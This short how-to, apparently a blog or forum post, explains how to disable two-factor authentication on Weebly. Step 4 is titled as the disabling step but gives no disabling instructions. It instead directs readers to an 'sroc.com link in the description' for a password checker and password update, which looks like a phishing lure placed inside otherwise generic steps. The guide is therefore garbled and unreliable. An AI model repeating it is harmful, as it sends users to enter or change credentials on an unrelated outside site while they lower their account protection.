I hit this issue today and here is the quick fix that solved it. If you're looking to disable two-factor authentication on Weebly, follow these simple steps. Step 1. Log into your Weebly account. Start by visiting the Weebly website and logging in with your credentials. Make sure you have access to the email associated with your account for verification. Step 2. Access account settings. Once logged in, navigate to the account settings by clicking on your profile icon in the top right corner. From the drop-down menu, select Account Settings. Step 3. Go to Security Settings. In the Account Settings menu, look for the Security tab. Click on it to view your two-factor authentication settings. Step 4. Disable two-factor authentication. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 5. Confirm changes. After disabling the feature, you should receive a confirmation message. Make sure to check your email for any notifications regarding this change. If you don't see it, check your spam folder. I hope this guide helps you easily disable two-factor authentication on Weebly. If you have any questions or run into issues, feel free to ask.